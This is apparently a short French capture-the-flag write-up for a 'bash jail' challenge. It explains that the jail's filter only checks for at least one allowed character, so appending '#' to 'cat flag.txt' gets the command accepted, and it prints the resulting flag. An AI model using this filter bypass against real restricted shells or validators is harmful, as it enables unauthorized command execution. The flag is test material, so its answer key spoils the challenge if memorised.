Essaie d'exéc une commande pour récupérer le flag si t'es chaud :p
Connexion: nc intro.ctfrei.fr 4446
Ce challenge tourne sur un docker et n'est pas disponible
Solution
Dans le script donné, à la ligne 8 la condition est :
ifnotany([x in code for x in allowed])
Elle signifie littéralement que dans ce que l'on rentre, au moins un seul caractère fasse partie de la liste allowed. La liste étant !#$'()<>\{}, il suffit d'ajouter # à la fin de notre commande pour qu'elle soit acceptée sans être modifiée.
$ nc intro.ctfrei.fr 4446
Bienvenue dans ma bash jail !
Essaie d'exéc une commande pour récupérer le flag si t'es chaud :p
>>> cat flag.txt #
CTFREI{b45h_j41l5_4r3_4l50_fun!}
